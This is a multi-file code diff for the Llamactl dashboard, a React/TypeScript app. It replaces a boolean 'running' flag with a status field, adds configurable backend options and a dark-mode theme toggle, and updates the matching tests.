 import { InstancesProvider } from '@/contexts/InstancesContext'
 import { instancesApi } from '@/lib/api'
 import type { Instance } from '@/types/instance'
+import { BackendType } from '@/types/instance'
 import { AuthProvider } from '@/contexts/AuthContext'

 // Mock the API
@@ -46,8 +47,8 @@ function renderApp() {
 describe('App Component - Critical Business Logic Only', () => {
 const mockInstances: Instance[] = [
-{ name: 'test-instance-1', running: false, options: { model: 'model1.gguf' } },
-{ name: 'test-instance-2', running: true, options: { model: 'model2.gguf' } }
+{ name: 'test-instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
+{ name: 'test-instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } }
 ]

 beforeEach(() => {
@@ -55,6 +56,21 @@
 vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
 window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
 global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
+
+// Mock window.matchMedia for dark mode functionality
+Object.defineProperty(window, 'matchMedia', {
+writable: true,
+value: vi.fn().mockImplementation((query: string) => ({
+matches: false,
+media: query,
+onchange: null,
+addListener: vi.fn(),
+removeListener: vi.fn(),
+addEventListener: vi.fn(),
+removeEventListener: vi.fn(),
+dispatchEvent: vi.fn(),
+})),
+})
 })

 afterEach(() => {
@@ -66,8 +82,8 @@
 const user = userEvent.setup()
 const newInstance: Instance = {
 name: 'new-test-instance',
-running: false,
-options: { model: 'new-model.gguf' }
+status: 'stopped',
+options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'new-model.gguf' } }
 }
 vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
@@ -90,6 +106,7 @@
 await waitFor(() => {
 expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', {
 auto_restart: true, // Default value
+backend_type: BackendType.LLAMA_CPP
 })
 })
@@ -103,8 +120,8 @@
 const user = userEvent.setup()
 const updatedInstance: Instance = {
 name: 'test-instance-1',
-running: false,
-options: { model: 'updated-model.gguf' }
+status: 'stopped',
+options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'updated-model.gguf' } }
 }
 vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
@@ -123,7 +140,8 @@
 // Verify correct API call with existing instance data
 await waitFor(() => {
 expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', {
-model: "model1.gguf", // Pre-filled from existing instance
+backend_type: BackendType.LLAMA_CPP,
+backend_options: { model: "model1.gguf" } // Pre-filled from existing instance
 })
 })
 })


@@ -0,0 +1,123 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { BackendOptions } from '@/schemas/instanceOptions'
import { getBackendFieldType, basicBackendFieldsConfig } from '@/lib/zodFormUtils'
interface BackendFormFieldProps {
fieldKey: keyof BackendOptions
value: string | number | boolean | string[] | undefined
onChange: (key: string, value: string | number | boolean | string[] | undefined) => void
}
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey as string, newValue)
}
const renderField = () => {
switch (fieldType) {
case 'boolean':
return (
<div className="flex items-center space-x-2">
<Checkbox
id={fieldKey}
checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)}
/>
<Label htmlFor={fieldKey} className="text-sm font-normal">
{config.label}
{config.description && (
<span className="text-muted-foreground ml-1">- {config.description}</span>
)}
</Label>
</div>
)
case 'number':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="number"
step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
// Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
case 'array':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={Array.isArray(value) ? value.join(', ') : ''}
onChange={(e) => {
const arrayValue = e.target.value
? e.target.value.split(',').map(s => s.trim()).filter(Boolean)
: undefined
handleChange(arrayValue)
}}
placeholder="item1, item2, item3"
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
<p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
</div>
)
case 'text':
default:
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
}
}
return <div className="space-y-2">{renderField()}</div>
}
export default BackendFormField


@@ -1,6 +1,7 @@
 import { Button } from "@/components/ui/button";
-import { HelpCircle, LogOut } from "lucide-react";
+import { HelpCircle, LogOut, Moon, Sun } from "lucide-react";
 import { useAuth } from "@/contexts/AuthContext";
+import { useTheme } from "@/contexts/ThemeContext";

 interface HeaderProps {
 onCreateInstance: () => void;
@@ -9,6 +10,7 @@ interface HeaderProps {
 function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
 const { logout } = useAuth();
+const { theme, toggleTheme } = useTheme();

 const handleLogout = () => {
 if (confirm("Are you sure you want to logout?")) {
@@ -17,10 +19,10 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
 };

 return (
-<header className="bg-white border-b border-gray-200">
+<header className="bg-card border-b border-border">
 <div className="container mx-auto max-w-4xl px-4 py-4">
 <div className="flex items-center justify-between">
-<h1 className="text-2xl font-bold text-gray-900">
+<h1 className="text-2xl font-bold text-foreground">
 Llamactl Dashboard
 </h1>
@@ -29,6 +31,16 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
 Create Instance
 </Button>

+<Button
+variant="outline"
+size="icon"
+onClick={toggleTheme}
+data-testid="theme-toggle-button"
+title={`Switch to ${theme === 'light' ? 'dark' : 'light'} mode`}
+>
+{theme === 'light' ? <Moon className="h-4 w-4" /> : <Sun className="h-4 w-4" />}
+</Button>
+
 <Button
 variant="outline"
 size="icon"


@@ -27,6 +27,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
 return <XCircle className="h-3 w-3" />;
 case "unknown":
 return <Loader2 className="h-3 w-3 animate-spin" />;
+case "failed":
+return <XCircle className="h-3 w-3" />;
 }
 };
@@ -40,6 +42,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
 return "destructive";
 case "unknown":
 return "secondary";
+case "failed":
+return "destructive";
 }
 };
@@ -53,6 +57,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
 return "Error";
 case "unknown":
 return "Unknown";
+case "failed":
+return "Failed";
 }
 };


@@ -24,7 +24,7 @@ function InstanceCard({
 editInstance,
 }: InstanceCardProps) {
 const [isLogsOpen, setIsLogsOpen] = useState(false);
-const health = useInstanceHealth(instance.name, instance.running);
+const health = useInstanceHealth(instance.name, instance.status);

 const handleStart = () => {
 startInstance(instance.name);
@@ -50,13 +50,15 @@
 setIsLogsOpen(true);
 };

+const running = instance.status === "running";
+
 return (
 <>
 <Card>
 <CardHeader className="pb-3">
 <div className="flex items-center justify-between">
 <CardTitle className="text-lg">{instance.name}</CardTitle>
-{instance.running && <HealthBadge health={health} />}
+{running && <HealthBadge health={health} />}
 </div>
 </CardHeader>
@@ -66,7 +68,7 @@
 size="sm"
 variant="outline"
 onClick={handleStart}
-disabled={instance.running}
+disabled={running}
 title="Start instance"
 data-testid="start-instance-button"
 >
@@ -77,7 +79,7 @@
 size="sm"
 variant="outline"
 onClick={handleStop}
-disabled={!instance.running}
+disabled={!running}
 title="Stop instance"
 data-testid="stop-instance-button"
 >
@@ -108,7 +110,7 @@
 size="sm"
 variant="destructive"
 onClick={handleDelete}
-disabled={instance.running}
+disabled={running}
 title="Delete instance"
 data-testid="delete-instance-button"
 >
@@ -122,7 +124,7 @@
 open={isLogsOpen}
 onOpenChange={setIsLogsOpen}
 instanceName={instance.name}
-isRunning={instance.running}
+isRunning={running}
 />
 </>
 );


@@ -10,10 +10,11 @@ import {
DialogHeader, DialogHeader,
DialogTitle, DialogTitle,
} from "@/components/ui/dialog"; } from "@/components/ui/dialog";
import type { CreateInstanceOptions, Instance } from "@/types/instance"; import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils"; import { getBasicFields, getAdvancedFields, getBasicBackendFields, getAdvancedBackendFields } from "@/lib/zodFormUtils";
import { ChevronDown, ChevronRight } from "lucide-react"; import { ChevronDown, ChevronRight } from "lucide-react";
import ZodFormField from "@/components/ZodFormField"; import ZodFormField from "@/components/ZodFormField";
import BackendFormField from "@/components/BackendFormField";
interface InstanceDialogProps { interface InstanceDialogProps {
open: boolean; open: boolean;
@@ -29,7 +30,6 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
instance, instance,
}) => { }) => {
const isEditing = !!instance; const isEditing = !!instance;
const isRunning = instance?.running || true; // Assume running if instance exists
const [instanceName, setInstanceName] = useState(""); const [instanceName, setInstanceName] = useState("");
const [formData, setFormData] = useState<CreateInstanceOptions>({}); const [formData, setFormData] = useState<CreateInstanceOptions>({});
@@ -39,6 +39,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Get field lists dynamically from the type // Get field lists dynamically from the type
const basicFields = getBasicFields(); const basicFields = getBasicFields();
const advancedFields = getAdvancedFields(); const advancedFields = getAdvancedFields();
const basicBackendFields = getBasicBackendFields();
const advancedBackendFields = getAdvancedBackendFields();
// Reset form when dialog opens/closes or when instance changes // Reset form when dialog opens/closes or when instance changes
useEffect(() => { useEffect(() => {
@@ -52,6 +54,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
setInstanceName(""); setInstanceName("");
setFormData({ setFormData({
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP, // Default backend type
backend_options: {},
}); });
} }
setShowAdvanced(false); // Always start with basic view setShowAdvanced(false); // Always start with basic view
@@ -66,6 +70,16 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
})); }));
}; };
const handleBackendFieldChange = (key: string, value: any) => {
setFormData((prev) => ({
...prev,
backend_options: {
...prev.backend_options,
[key]: value,
},
}));
};
const handleNameChange = (name: string) => { const handleNameChange = (name: string) => {
setInstanceName(name); setInstanceName(name);
// Validate instance name // Validate instance name
@@ -90,7 +104,24 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Clean up undefined values to avoid sending empty fields // Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {}; const cleanOptions: CreateInstanceOptions = {};
Object.entries(formData).forEach(([key, value]) => { Object.entries(formData).forEach(([key, value]) => {
if (value !== undefined && value !== "" && value !== null) { if (key === 'backend_options' && value && typeof value === 'object') {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(backendValue) && backendValue.length === 0) {
return;
}
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays // Handle arrays - don't include empty arrays
if (Array.isArray(value) && value.length === 0) { if (Array.isArray(value) && value.length === 0) {
return; return;
@@ -114,6 +145,16 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Check if auto_restart is enabled // Check if auto_restart is enabled
const isAutoRestartEnabled = formData.auto_restart === true; const isAutoRestartEnabled = formData.auto_restart === true;
// Save button label logic
let saveButtonLabel = "Create Instance";
if (isEditing) {
if (instance?.status === "running") {
saveButtonLabel = "Update & Restart Instance";
} else {
saveButtonLabel = "Update Instance";
}
}
return ( return (
<Dialog open={open} onOpenChange={onOpenChange}> <Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col"> <DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col">
@@ -187,8 +228,9 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
(fieldKey) => (fieldKey) =>
fieldKey !== "auto_restart" && fieldKey !== "auto_restart" &&
fieldKey !== "max_restarts" && fieldKey !== "max_restarts" &&
fieldKey !== "restart_delay" fieldKey !== "restart_delay" &&
) // Exclude auto_restart, max_restarts, and restart_delay as they're handled above fieldKey !== "backend_options" // backend_options is handled separately
)
.map((fieldKey) => ( .map((fieldKey) => (
<ZodFormField <ZodFormField
key={fieldKey} key={fieldKey}
@@ -199,6 +241,21 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
))} ))}
</div> </div>
{/* Backend Configuration Section */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Backend Configuration</h3>
{/* Basic backend fields */}
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
{/* Advanced Fields Toggle */} {/* Advanced Fields Toggle */}
<div className="border-t pt-4"> <div className="border-t pt-4">
<Button <Button
@@ -217,8 +274,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
{ {
advancedFields.filter( advancedFields.filter(
(f) => (f) =>
!["max_restarts", "restart_delay"].includes(f as string) !["max_restarts", "restart_delay", "backend_options"].includes(f as string)
).length ).length + advancedBackendFields.length
}{" "} }{" "}
options) options)
</span> </span>
@@ -228,24 +285,51 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
{/* Advanced Fields - Automatically generated from type (excluding restart options) */} {/* Advanced Fields - Automatically generated from type (excluding restart options) */}
{showAdvanced && ( {showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted"> <div className="space-y-4 pl-6 border-l-2 border-muted">
<div className="space-y-4"> {/* Advanced instance fields */}
{advancedFields {advancedFields
.filter( .filter(
(fieldKey) => (fieldKey) =>
!["max_restarts", "restart_delay"].includes( !["max_restarts", "restart_delay", "backend_options"].includes(
fieldKey as string fieldKey as string
) )
) // Exclude restart options as they're handled above ).length > 0 && (
<div className="space-y-4">
<h4 className="text-md font-medium">Advanced Instance Configuration</h4>
{advancedFields
.filter(
(fieldKey) =>
!["max_restarts", "restart_delay", "backend_options"].includes(
fieldKey as string
)
)
.sort() .sort()
.map((fieldKey) => ( .map((fieldKey) => (
<ZodFormField <ZodFormField
key={fieldKey} key={fieldKey}
fieldKey={fieldKey} fieldKey={fieldKey}
value={formData[fieldKey]} value={fieldKey === 'backend_options' ? undefined : formData[fieldKey]}
onChange={handleFieldChange} onChange={handleFieldChange}
/> />
))} ))}
</div> </div>
)}
{/* Advanced backend fields */}
{advancedBackendFields.length > 0 && (
<div className="space-y-4">
<h4 className="text-md font-medium">Advanced Backend Configuration</h4>
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
)}
</div> </div>
)} )}
</div> </div>
@@ -264,11 +348,7 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
disabled={!instanceName.trim() || !!nameError}
data-testid="dialog-save-button"
>
- {isEditing
- ? isRunning
- ? "Update & Restart Instance"
- : "Update Instance"
- : "Create Instance"}
+ {saveButtonLabel}
</Button>
</DialogFooter>
</DialogContent>

View File

@@ -18,8 +18,8 @@ function InstanceList({ editInstance }: InstanceListProps) {
return (
<div className="flex items-center justify-center py-12" aria-label="Loading">
<div className="text-center">
- <div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
- <p className="text-gray-600">Loading instances...</p>
+ <div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
+ <p className="text-muted-foreground">Loading instances...</p>
</div>
</div>
)
@@ -28,7 +28,7 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (error) {
return (
<div className="text-center py-12">
- <div className="text-red-600 mb-4">
+ <div className="text-destructive mb-4">
<p className="text-lg font-semibold">Error loading instances</p>
<p className="text-sm">{error}</p>
</div>
@@ -39,15 +39,15 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (instances.length === 0) {
return (
<div className="text-center py-12">
- <p className="text-gray-600 text-lg mb-2">No instances found</p>
- <p className="text-gray-500 text-sm">Create your first instance to get started</p>
+ <p className="text-foreground text-lg mb-2">No instances found</p>
+ <p className="text-muted-foreground text-sm">Create your first instance to get started</p>
</div>
)
}
return (
<div className="space-y-4">
- <h2 className="text-xl font-semibold text-gray-900 mb-6">
+ <h2 className="text-xl font-semibold text-foreground mb-6">
Instances ({instances.length})
</h2>

View File

@@ -19,6 +19,15 @@ import {
} from 'lucide-react'
import { serverApi } from '@/lib/api'
+ // Helper to get version from environment
+ const getAppVersion = (): string => {
+ try {
+ return (import.meta.env as Record<string, string>).VITE_APP_VERSION || 'unknown'
+ } catch {
+ return 'unknown'
+ }
+ }
interface SystemInfoModalProps {
open: boolean
onOpenChange: (open: boolean) => void
@@ -109,9 +118,20 @@ const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
</div>
) : systemInfo ? (
<div className="space-y-6">
- {/* Version Section */}
+ {/* Llamactl Version Section */}
<div className="space-y-3">
- <h3 className="font-semibold">Version</h3>
+ <h3 className="font-semibold">Llamactl Version</h3>
+ <div className="bg-gray-900 rounded-lg p-4">
+ <pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
+ {getAppVersion()}
+ </pre>
+ </div>
+ </div>
+ {/* Llama Server Version Section */}
+ <div className="space-y-3">
+ <h3 className="font-semibold">Llama Server Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">

View File

@@ -3,6 +3,7 @@ import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { CreateInstanceOptions } from '@/types/instance'
+ import { BackendType } from '@/types/instance'
import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps {
@@ -23,6 +24,30 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
}
const renderField = () => {
+ // Special handling for backend_type field - render as dropdown
+ if (fieldKey === 'backend_type') {
+ return (
+ <div className="grid gap-2">
+ <Label htmlFor={fieldKey}>
+ {config.label}
+ {config.required && <span className="text-red-500 ml-1">*</span>}
+ </Label>
+ <select
+ id={fieldKey}
+ value={typeof value === 'string' ? value : BackendType.LLAMA_CPP}
+ onChange={(e) => handleChange(e.target.value || undefined)}
+ className="flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background file:border-0 file:bg-transparent file:text-sm file:font-medium placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50"
+ >
+ <option value={BackendType.LLAMA_CPP}>Llama Server</option>
+ {/* Add more backend types here as they become available */}
+ </select>
+ {config.description && (
+ <p className="text-sm text-muted-foreground">{config.description}</p>
+ )}
+ </div>
+ )
+ }
switch (fieldType) {
case 'boolean':
return (

View File

@@ -3,6 +3,7 @@ import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance'
+ import { BackendType } from '@/types/instance'
// Mock the health hook since we're not testing health logic here
vi.mock('@/hooks/useInstanceHealth', () => ({
@@ -17,14 +18,14 @@ describe('InstanceCard - Instance Actions and State', () => {
const stoppedInstance: Instance = {
name: 'test-instance',
- running: false,
- options: { model: 'test-model.gguf' }
+ status: 'stopped',
+ options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'test-model.gguf' } }
}
const runningInstance: Instance = {
name: 'running-instance',
- running: true,
- options: { model: 'running-model.gguf' }
+ status: 'running',
+ options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'running-model.gguf' } }
}
beforeEach(() => {
@@ -301,7 +302,7 @@ afterEach(() => {
it('handles instance with minimal data', () => {
const minimalInstance: Instance = {
name: 'minimal',
- running: false,
+ status: 'stopped',
options: {}
}
@@ -323,7 +324,7 @@ afterEach(() => {
it('handles instance with undefined options', () => {
const instanceWithoutOptions: Instance = {
name: 'no-options',
- running: true,
+ status: 'running',
options: undefined
}

View File

@@ -5,6 +5,7 @@ import InstanceList from '@/components/InstanceList'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
+ import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -44,9 +45,9 @@ describe('InstanceList - State Management and UI Logic', () => {
const mockEditInstance = vi.fn()
const mockInstances: Instance[] = [
- { name: 'instance-1', running: false, options: { model: 'model1.gguf' } },
- { name: 'instance-2', running: true, options: { model: 'model2.gguf' } },
- { name: 'instance-3', running: false, options: { model: 'model3.gguf' } }
+ { name: 'instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
+ { name: 'instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } },
+ { name: 'instance-3', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model3.gguf' } } }
]
const DUMMY_API_KEY = 'test-api-key-123'

View File

@@ -3,6 +3,7 @@ import { render, screen, waitFor } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceDialog from '@/components/InstanceDialog'
import type { Instance } from '@/types/instance'
+ import { BackendType } from '@/types/instance'
describe('InstanceModal - Form Logic and Validation', () => {
const mockOnSave = vi.fn()
@@ -91,6 +92,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('my-instance', {
auto_restart: true, // Default value
+ backend_type: BackendType.LLAMA_CPP
})
})
@@ -134,10 +136,10 @@ afterEach(() => {
describe('Edit Mode', () => {
const mockInstance: Instance = {
name: 'existing-instance',
- running: false,
+ status: 'stopped',
options: {
- model: 'test-model.gguf',
- gpu_layers: 10,
+ backend_type: BackendType.LLAMA_CPP,
+ backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
}
}
@@ -177,14 +179,14 @@ afterEach(() => {
await user.click(screen.getByTestId('dialog-save-button'))
expect(mockOnSave).toHaveBeenCalledWith('existing-instance', {
- model: 'test-model.gguf',
- gpu_layers: 10,
+ backend_type: BackendType.LLAMA_CPP,
+ backend_options: { model: 'test-model.gguf', gpu_layers: 10 },
auto_restart: false
})
})
it('shows correct button text for running vs stopped instances', () => {
- const runningInstance: Instance = { ...mockInstance, running: true }
+ const runningInstance: Instance = { ...mockInstance, status: 'running' }
const { rerender } = render(
<InstanceDialog
@@ -271,6 +273,7 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('test-instance', {
auto_restart: true,
+ backend_type: BackendType.LLAMA_CPP,
max_restarts: 5,
restart_delay: 10
})
@@ -321,6 +324,7 @@ afterEach(() => {
// Should only include non-empty values
expect(mockOnSave).toHaveBeenCalledWith('clean-instance', {
auto_restart: true, // Only this default value should be included
+ backend_type: BackendType.LLAMA_CPP
})
})
@@ -345,7 +349,8 @@ afterEach(() => {
expect(mockOnSave).toHaveBeenCalledWith('numeric-test', {
auto_restart: true,
- gpu_layers: 15, // Should be number, not string
+ backend_type: BackendType.LLAMA_CPP,
+ backend_options: { gpu_layers: 15 }, // Should be number, not string
})
})
})

View File

@@ -113,8 +113,8 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
setError(null)
await instancesApi.start(name)
- // Update only this instance's running status
- updateInstanceInMap(name, { running: true })
+ // Update only this instance's status
+ updateInstanceInMap(name, { status: "running" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to start instance')
}
@@ -125,8 +125,8 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
setError(null)
await instancesApi.stop(name)
- // Update only this instance's running status
- updateInstanceInMap(name, { running: false })
+ // Update only this instance's status
+ updateInstanceInMap(name, { status: "stopped" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to stop instance')
}
@@ -137,8 +137,8 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
setError(null)
await instancesApi.restart(name)
- // Update only this instance's running status
- updateInstanceInMap(name, { running: true })
+ // Update only this instance's status
+ updateInstanceInMap(name, { status: "running" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to restart instance')
}

View File

@@ -0,0 +1,54 @@
import { createContext, useContext, useEffect, useState, type ReactNode } from "react";
type Theme = "light" | "dark";
interface ThemeContextType {
theme: Theme;
toggleTheme: () => void;
}
const ThemeContext = createContext<ThemeContextType | undefined>(undefined);
interface ThemeProviderProps {
children: ReactNode;
}
export function ThemeProvider({ children }: ThemeProviderProps) {
const [theme, setTheme] = useState<Theme>(() => {
const stored = localStorage.getItem("theme");
if (stored === "light" || stored === "dark") {
return stored;
}
return window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
});
useEffect(() => {
const root = document.documentElement;
if (theme === "dark") {
root.classList.add("dark");
} else {
root.classList.remove("dark");
}
localStorage.setItem("theme", theme);
}, [theme]);
const toggleTheme = () => {
setTheme(prevTheme => prevTheme === "light" ? "dark" : "light");
};
return (
<ThemeContext.Provider value={{ theme, toggleTheme }}>
{children}
</ThemeContext.Provider>
);
}
export function useTheme() {
const context = useContext(ThemeContext);
if (context === undefined) {
throw new Error("useTheme must be used within a ThemeProvider");
}
return context;
}

View File

@@ -4,6 +4,7 @@ import type { ReactNode } from "react";
import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
import { instancesApi } from "@/lib/api";
import type { Instance } from "@/types/instance";
+ import { BackendType } from "@/types/instance";
import { AuthProvider } from "../AuthContext";
// Mock the API module
@@ -41,19 +42,19 @@ function TestComponent() {
<div data-testid="instances-count">{instances.length}</div>
{instances.map((instance) => (
<div key={instance.name} data-testid={`instance-${instance.name}`}>
- {instance.name}:{instance.running.toString()}
+ {instance.name}:{instance.status}
</div>
))}
{/* Action buttons for testing with specific instances */}
<button
- onClick={() => createInstance("new-instance", { model: "test.gguf" })}
+ onClick={() => createInstance("new-instance", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } })}
data-testid="create-instance"
>
Create Instance
</button>
<button
- onClick={() => updateInstance("instance1", { model: "updated.gguf" })}
+ onClick={() => updateInstance("instance1", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } })}
data-testid="update-instance"
>
Update Instance
@@ -99,8 +100,8 @@ function renderWithProvider(children: ReactNode) {
describe("InstancesContext", () => { describe("InstancesContext", () => {
const mockInstances: Instance[] = [ const mockInstances: Instance[] = [
{ name: "instance1", running: true, options: { model: "model1.gguf" } }, { name: "instance1", status: "running", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model1.gguf" } } },
{ name: "instance2", running: false, options: { model: "model2.gguf" } }, { name: "instance2", status: "stopped", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model2.gguf" } } },
]; ];
beforeEach(() => { beforeEach(() => {
@@ -132,10 +133,10 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false"); expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId("instances-count")).toHaveTextContent("2"); expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId("instance-instance1")).toHaveTextContent( expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true" "instance1:running"
); );
expect(screen.getByTestId("instance-instance2")).toHaveTextContent( expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false" "instance2:stopped"
); );
}); });
}); });
@@ -158,8 +159,8 @@ describe("InstancesContext", () => {
it("creates instance and adds it to state", async () => { it("creates instance and adds it to state", async () => {
const newInstance: Instance = { const newInstance: Instance = {
name: "new-instance", name: "new-instance",
running: false, status: "stopped",
options: { model: "test.gguf" }, options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } },
}; };
vi.mocked(instancesApi.create).mockResolvedValue(newInstance); vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -174,14 +175,15 @@ describe("InstancesContext", () => {
await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
- model: "test.gguf",
+ backend_type: BackendType.LLAMA_CPP,
+ backend_options: { model: "test.gguf" }
});
});
await waitFor(() => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
- "new-instance:false"
+ "new-instance:stopped"
);
});
});
